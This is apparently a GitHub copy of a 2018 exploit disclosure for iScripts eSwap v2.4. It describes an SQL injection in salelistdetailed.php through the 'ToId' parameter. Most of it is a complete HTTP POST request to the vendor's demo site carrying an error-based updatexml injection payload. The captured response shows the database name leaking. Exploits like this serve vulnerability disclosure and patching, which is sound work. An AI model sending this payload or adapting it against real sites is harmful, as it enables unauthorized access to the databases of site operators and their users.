Skip to content
Permalink
master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time

Exploit title: iScripts eSwap v2.4 - SQL injection via the salelistdetailed.php User Panel

Date: 22/05/2018

Exploit Author: Keyone

Vendor Homepage: https://www.iscripts.com

Software Link: https://www.iscripts.com/eswap

Demo Link: https://www.demo.iscripts.com/eswap/demo//index.php

Version: 2.4

Tested on: Windows 7

Category: Webapps

CVE:


Description


iScripts eSwap v2.4 has SQL injection via the "salelistdetailed.php" function parameter in User Panel.

POC : 'ToId' parameter


Request:

POST /eswap/demo/salelistdetailed.php?type=sell HTTP/1.1
Host: www.demo.iscripts.com
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36
Accept: */*
DNT: 1
Referer: https://www.demo.iscripts.com/eswap/demo/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: __utmc=227100805; __utmz=227100805.1526871632.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=csv8f9jgmjl6sh1spblmikbra0; messagesUtk=4f44605715d9c930d9c1241135f98fbf; __utma=129714457.1643618766.1526980257.1526980257.1526980257.1; __utmc=129714457; __utmz=129714457.1526980257.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=227100805.862283.1526871632.1526871632.1526980259.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 171

btnGo=Send%20Message&btnSubAdd=1&msgId=1&qyery=type=sell&ToId=1' and (select updatexml(1,concat(0x2b,database()),1)) and '1'='1&txtMsg=1&txtMsg46=1&txtTitle=1&txtTitle46=Mr.

Response:

HTTP/1.1 200 OK
Date: Tue, 22 May 2018 14:49:27 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 16833
...
</div></div>
<div class="col-lg-9">
<div>
XPATH syntax error: '+productd_eswapdemo'